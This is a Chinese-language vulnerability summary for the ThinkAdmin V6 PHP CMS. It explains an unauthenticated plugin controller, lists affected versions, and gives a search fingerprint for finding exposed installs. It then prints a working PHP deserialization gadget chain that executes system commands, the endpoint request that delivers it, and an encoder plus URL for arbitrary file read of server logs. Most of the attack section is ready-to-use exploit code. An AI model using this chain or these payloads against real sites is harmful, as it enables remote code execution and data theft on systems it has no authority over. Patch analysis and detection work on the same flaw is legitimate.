thinkadmin V6 漏洞总结
0x00 漏洞原理
插件控制器未加认证,直接无需认证利用,github提的issue说是任意文件读取,其实再早之前还有反序列化
0x01 漏洞影响
- 任意文件读取代码 自2019年11月1日至2020年8月3日前的所有版本
- 反序列化代码自2019年11月1日至2020年6月16日前所有版本
0x02 cms搜索规则
title="thinkadmin" && body="v6.0"
0x03 漏洞利用
反序列化
测试链子发现mac和win都可以触发,唯独在linux下用不了,原因是__destruct触发不了
后请教了一下七月火师傅,将序列化本来直接传object改成传数组解决了
链子代码:(来源于90sec)
1 <?php 2 namespace think; 3 use think\model\Pivot; 4 abstract class Model{ 5 private $lazySave = false; # save() 6 private $exists = false; # updateData() 7 protected $connection; 8 protected $name; # __toString() Conversion.php =>Pivot 9 private $withAttr = []; # assert 10 protected $hidden = []; 11 private $data = []; 12 protected $withEvent = false; 13 private $force = false; 14 protected $field = []; 15 protected $schema = []; 16 17 function __construct(){ 18 $this->lazySave = true; 19 $this->exists = true; 20 $this->withEvent = false; 21 $this->force = true; 22 $this->connection = "mysql"; 23 $this->withAttr = ["test"=>"system"]; 24 $this->data = ["test"=>"whoami"]; 25 $this->hidden = ["test"=>"123"]; 26 27 $this->field = []; 28 $this->schema = []; 29 } 30 } 31 namespace think\model; 32 use think\Model; 33 # Model 是一个抽象类,我们找到它的继承类,此处选取的是 Pivot 类 34 class Pivot extends Model{ 35 function __construct($obj=""){ 36 parent::__construct(); 37 $this->name = $obj; # $this->name放子类构造方法中赋值,直接放基类属性中初始化不成功 38 } 39 } 40 $a=new Pivot(); 41 echo urlencode(serialize([new Pivot($a),123]));
payload:
/admin/login.html?s=admin/api.Update/tree host: Content-Type: application/x-www-form-urlencoded rules=
任意文件读取
encode代码:
1 <?php 2 function encode($content) 3 { 4 [$chars, $length] = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))]; 5 for ($i = 0; $i < $length; $i++) $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0); 6 return $chars; 7 } 8 echo encode('runtime/admin/log/single_sql.log'); 9 ?>
payload:
/admin/login.html?s=admin/api.Update/get/encode/加密的字符串
